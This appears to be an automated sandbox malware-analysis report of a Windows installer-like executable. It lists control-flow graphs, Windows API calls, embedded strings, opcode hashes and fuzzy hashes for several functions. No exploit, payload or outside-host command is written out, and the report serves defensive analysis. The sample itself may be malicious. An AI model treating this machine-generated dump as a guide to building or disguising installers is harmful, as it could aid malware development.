                                                          control_flow_graph 367 405942-40595a call 406312 370 40595c-40596c call 405f67 367->370 371 40596e-4059a6 call 405ee9 367->371 380 4059c9-4059f2 call 403eab call 406794 370->380 376 4059a8-4059b9 call 405ee9 371->376 377 4059be-4059c4 lstrcatW 371->377 376->377 377->380 385 405a86-405a8e call 406794 380->385 386 4059f8-4059fd 380->386 392 405a90-405a97 call 40681b 385->392 393 405a9c-405aa3 385->393 386->385 387 405a03-405a2b call 405ee9 386->387 387->385 394 405a2d-405a31 387->394 392->393 396 405aa5-405aab 393->396 397 405abc-405ae1 LoadImageW 393->397 398 405a33-405a42 call 405d1c 394->398 399 405a45-405a51 lstrlenW 394->399 396->397 400 405aad-405ab2 call 403e8a 396->400 401 405ae7-405b29 RegisterClassW 397->401 402 405b7c-405b84 call 40141d 397->402 398->399 407 405a53-405a61 lstrcmpiW 399->407 408 405a79-405a81 call 406738 call 40601f 399->408 400->397 403 405c4b 401->403 404 405b2f-405b77 SystemParametersInfoW CreateWindowExW 401->404 417 405b86-405b89 402->417 418 405b8e-405b99 call 403eab 402->418 413 405c4d-405c54 403->413 404->402 407->408 414 405a63-405a6d GetFileAttributesW 407->414 408->385 419 405a73-405a74 call 406767 414->419 420 405a6f-405a71 414->420 417->413 425 405c22-405c2a call 40505d 418->425 426 405b9f-405bbc ShowWindow LoadLibraryW 418->426 419->408 420->408 420->419 433 405c44-405c46 call 40141d 425->433 434 405c2c-405c32 425->434 428 405bc5-405bd7 GetClassInfoW 426->428 429 405bbe-405bc3 LoadLibraryW 426->429 431 405bd9-405be9 GetClassInfoW RegisterClassW 428->431 432 405bef-405c12 DialogBoxParamW call 40141d 428->432 429->428 431->432 438 405c17-405c20 call 403c7e 432->438 433->403 434->417 436 405c38-405c3f call 40141d 434->436 436->417 438->413
                                                          APIs
                                                            • Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
                                                            • Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
                                                            • Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D
                                                          • lstrcatW.KERNEL32(008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000,00000006,008420A0,-00000002,00000000,008560C8,00403AD7,?), ref: 004059C4
                                                          • lstrlenW.KERNEL32(007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000,00000006,008420A0), ref: 00405A46
                                                          • lstrcmpiW.KERNEL32(007E0D58,.exe,007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000), ref: 00405A59
                                                          • GetFileAttributesW.KERNEL32(007E0D60), ref: 00405A64
                                                            • Part of subcall function 00405F67: wsprintfW.USER32 ref: 00405F74
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,008460A8), ref: 00405ACD
                                                          • RegisterClassW.USER32(007E9580), ref: 00405B20
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B38
                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B71
                                                            • Part of subcall function 00403EAB: SetWindowTextW.USER32(00000000,007E95E0), ref: 00403F46
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BA7
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BB8
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BC3
                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,007E9580), ref: 00405BD3
                                                          • GetClassInfoW.USER32(00000000,RichEdit,007E9580), ref: 00405BE0
                                                          • RegisterClassW.USER32(007E9580), ref: 00405BE9
                                                          • DialogBoxParamW.USER32(?,00000000,0040548F,00000000), ref: 00405C08
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$`~$b~$xZ|
                                                          • API String ID: 608394941-1309837594
                                                          • Opcode ID: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
                                                          • Instruction ID: f5a039cb880b9eaee1ecdf0536d3c824aabf016c99065ad96b2918c6fc8c0824
                                                          • Opcode Fuzzy Hash: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
                                                          • Instruction Fuzzy Hash: 0A718071600605AED710ABA5AD85E3B37ACEB84748F00413EF941B62E2DB7C5C51CE6D
                                                          Function 0040359D Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 443 40359d-4035eb GetTickCount GetModuleFileNameW call 405e66 446 4035f7-403625 call 40601f call 406767 call 40601f GetFileSize 443->446 447 4035ed-4035f2 443->447 455 403712-403720 call 4032d2 446->455 456 40362b 446->456 448 4037cc-4037d0 447->448 462 403726-403729 455->462 463 4037db-4037e0 455->463 458 403630-403647 456->458 460 403649 458->460 461 40364b-40364d call 403336 458->461 460->461 467 403652-403654 461->467 465 403755-40377f GlobalAlloc call 403368 call 40337f 462->465 466 40372b-403743 call 403368 call 403336 462->466 463->448 465->463 494 403781-403792 465->494 466->463 489 403749-40374f 466->489 469 4037d3-4037da call 4032d2 467->469 470 40365a-403661 467->470 469->463 474 403663-403677 call 405e22 470->474 475 4036dd-4036e1 470->475 479 4036eb-4036f1 474->479 492 403679-403680 474->492 478 4036e3-4036ea call 4032d2 475->478 475->479 478->479 485 403700-40370a 479->485 486 4036f3-4036fd call 407297 479->486 485->458 493 403710 485->493 486->485 489->463 489->465 492->479 496 403682-403689 492->496 493->455 497 403794 494->497 498 40379a-40379d 494->498 496->479 500 40368b-403692 496->500 497->498 499 4037a0-4037a8 498->499 499->499 501 4037aa-4037c5 SetFilePointer call 405e22 499->501 500->479 502 403694-40369b 500->502 506 4037ca 501->506 502->479 503 40369d-4036bd 502->503 503->463 505 4036c3-4036c7 503->505 507 4036c9-4036cd 505->507 508 4036cf-4036d7 505->508 506->448 507->493 507->508 508->479 509 4036d9-4036db 508->509 509->479
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004035AE
                                                          • GetModuleFileNameW.KERNEL32(00000000,0085E0D8,00002004,?,?,?,00000000,00403A5D,?), ref: 004035CA
                                                            • Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
                                                            • Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C
                                                          • GetFileSize.KERNEL32(00000000,00000000,008620E0,00000000,0084E0B8,0084E0B8,0085E0D8,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00403616
                                                          Strings
                                                          • soft, xrefs: 0040368B
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037DB
                                                          • Inst, xrefs: 00403682
                                                          • Null, xrefs: 00403694
                                                          • bt, xrefs: 0040361C
                                                          • Error launching installer, xrefs: 004035ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$bt$soft
                                                          • API String ID: 4283519449-181140102
                                                          • Opcode ID: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
                                                          • Instruction ID: 2d5e6ab7a624250aa0c4fc4e0edfbfc1f0b135b6de304195c1858c8edc22daf3
                                                          • Opcode Fuzzy Hash: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
                                                          • Instruction Fuzzy Hash: A151B5B1900204ABDB209F65DD85BAE7FACEB04756F14853BEA00B72D1D73D9A44CB5C
                                                          Function 0040337F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 510 40337f-403398 511 4033a1-4033a9 510->511 512 40339a 510->512 513 4033b2-4033b7 511->513 514 4033ab 511->514 512->511 515 4033c7-4033d4 call 403336 513->515 516 4033b9-4033c2 call 403368 513->516 514->513 520 4033d6 515->520 521 4033de-4033e5 515->521 516->515 522 4033d8-4033d9 520->522 523 403529-40352b 521->523 524 4033eb-40340e GetTickCount 521->524 527 403596-40359a 522->527 525 403579-40357c 523->525 526 40352d-403530 523->526 528 403593 524->528 529 403414 524->529 530 403581-40358a call 403336 525->530 531 40357e 525->531 526->528 532 403532 526->532 528->527 533 403419-403421 529->533 530->520 542 403590 530->542 531->530 535 403537-40353d 532->535 536 403423 533->536 537 403426-40342f call 403336 533->537 539 403542-40354b call 403336 535->539 540 40353f 535->540 536->537 537->520 546 403431-40343a 537->546 539->520 548 403551-403564 WriteFile 539->548 540->539 542->528 547 403440-403460 call 40744b 546->547 555 403466-40347d GetTickCount 547->555 556 40351b-40351d 547->556 550 403522-403524 548->550 551 403566-403569 548->551 550->522 551->550 553 40356b-403575 551->553 553->535 554 403577 553->554 554->528 557 4034c8-4034cc 555->557 558 40347f-403487 555->558 556->522 561 403510-403513 557->561 562 4034ce-4034d1 557->562 559 403489-40348d 558->559 560 40348f-4034c0 MulDiv wsprintfW call 404f88 558->560 559->557 559->560 567 4034c5 560->567 561->533 563 403519 561->563 565 4034f3-4034fe 562->565 566 4034d3-4034e7 WriteFile 562->566 563->528 569 403501-403505 565->569 566->550 568 4034e9-4034ec 566->568 567->557 568->550 571 4034ee-4034f1 568->571 569->547 570 40350b 569->570 570->528 571->569
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004033EB
                                                          • GetTickCount.KERNEL32 ref: 0040346E
                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 0040349B
                                                          • wsprintfW.USER32 ref: 004034AE
                                                          • WriteFile.KERNELBASE(00000000,00000000,00423AB9,0040377C,00000000), ref: 004034DF
                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040355C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: CountFileTickWrite$wsprintf
                                                          • String ID: ... %d%%$P1B
                                                          • API String ID: 651206458-1497722
                                                          • Opcode ID: c98fe4888829193d15d66a8f940c07c2a35d93a6c948cb38a058ae9da671c941
                                                          • Instruction ID: fe8561038ca0c1f851d54235c72d98e4424113abdfb89388266e227e9cd06809
                                                          • Opcode Fuzzy Hash: c98fe4888829193d15d66a8f940c07c2a35d93a6c948cb38a058ae9da671c941
                                                          • Instruction Fuzzy Hash: E8617B7190021AEBCF10DF65E9846AF7BA8AB04316F14453BF905B6290DB789F50CBA9
                                                          Function 00404F88 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 572 404f88-404f9b 573 404fa1-404fb4 572->573 574 405058-40505a 572->574 575 404fb6-404fba call 40681b 573->575 576 404fbf-404fcb lstrlenW 573->576 575->576 578 404fe8-404fec 576->578 579 404fcd-404fdd lstrlenW 576->579 582 404ffb-404fff 578->582 583 404fee-404ff5 SetWindowTextW 578->583 580 405056-405057 579->580 581 404fdf-404fe3 lstrcatW 579->581 580->574 581->578 584 405001-405043 SendMessageW * 3 582->584 585 405045-405047 582->585 583->582 584->585 585->580 586 405049-40504e 585->586 586->580
                                                          APIs
                                                          • lstrlenW.KERNEL32(007B9A60,00423AB9,0041F150,00000000), ref: 00404FC0
                                                          • lstrlenW.KERNEL32(004034C5,007B9A60,00423AB9,0041F150,00000000), ref: 00404FD0
                                                          • lstrcatW.KERNEL32(007B9A60,004034C5,004034C5,007B9A60,00423AB9,0041F150,00000000), ref: 00404FE3
                                                          • SetWindowTextW.USER32(007B9A60,007B9A60), ref: 00404FF5
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040501B
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405035
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405043
                                                            • Part of subcall function 0040681B: GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00423AB9,0041F150,00000000), ref: 004068EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2740478559-0
                                                          • Opcode ID: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
                                                          • Instruction ID: be30987b008cdac283f352a72c5daf1bc185fc6a717e9f44ce2e47ebc7ce0ac4
                                                          • Opcode Fuzzy Hash: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
                                                          • Instruction Fuzzy Hash: BF219D71800118BBCF12AFA5DD849DEBFB8EF45350F10803AFA04B62A0D7794A50DB98
                                                          Function 00405E95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 587 405e95-405ea1 588 405ea2-405ed6 GetTickCount GetTempFileNameW 587->588 589 405ee5-405ee7 588->589 590 405ed8-405eda 588->590 591 405edf-405ee2 589->591 590->588 592 405edc 590->592 592->591
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405EB3
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403814,008520C0,008560C8), ref: 00405ECE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction ID: fc3ef10fc4e670788618d569d9e14e1d65dd7a664a0663973dbebc503530dd57
                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction Fuzzy Hash: C9F09675610604BBDB10CF59DD05A9FBBADEF94710F10803BEA45E7150E6B09E44C758
                                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 597 40139d-4013a2 598 40140c-40140e 597->598 599 401410 598->599 600 4013a4-4013b2 598->600 601 401412-401413 599->601 600->599 602 4013b4-4013bf call 4015a0 600->602 605 4013c1-4013c9 call 40137e 602->605 606 401416-40141b 602->606 609 4013cb-4013cd 605->609 610 4013cf-4013d4 605->610 606->601 611 4013d6-4013db 609->611 610->611 611->598 612 4013dd-401406 MulDiv SendMessageW 611->612 612->598
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
                                                          • Instruction ID: 4a7c6b10ca187eba816588ea1d9201846d19603f0f5fc62a4a658fec9e55caff
                                                          • Opcode Fuzzy Hash: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
                                                          • Instruction Fuzzy Hash: 22F0F432A10220DBDB165B349D44B263698AB44750F68863BF911FA2F1D67CCC128B5C
                                                          Function 00405E66 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 613 405e66-405e92 GetFileAttributesW CreateFileW
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                          Function 00405E46 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 618 405e46-405e53 GetFileAttributesW 619 405e63 618->619 620 405e55-405e5d SetFileAttributesW 618->620 620->619
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00406E97,?,?,?), ref: 00405E4A
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                          • Instruction ID: bfdd682a7b15487adc9015e6c601711f35dcdd947f77102e263bd76fd4388c72
                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                          • Instruction Fuzzy Hash: C1C01271404800AAC6010B34DF0881A7A26AB90370B298B3AB0BAE00F0CB3088A99A18
                                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 621 403336-403355 ReadFile 622 403361 621->622 623 403357-40335a 621->623 625 403363-403365 622->625 623->622 624 40335c-40335f 623->624 624->625
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1471775370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1471755641.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471794444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1471816218.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1472241411.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_sV9ElC4fU4.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
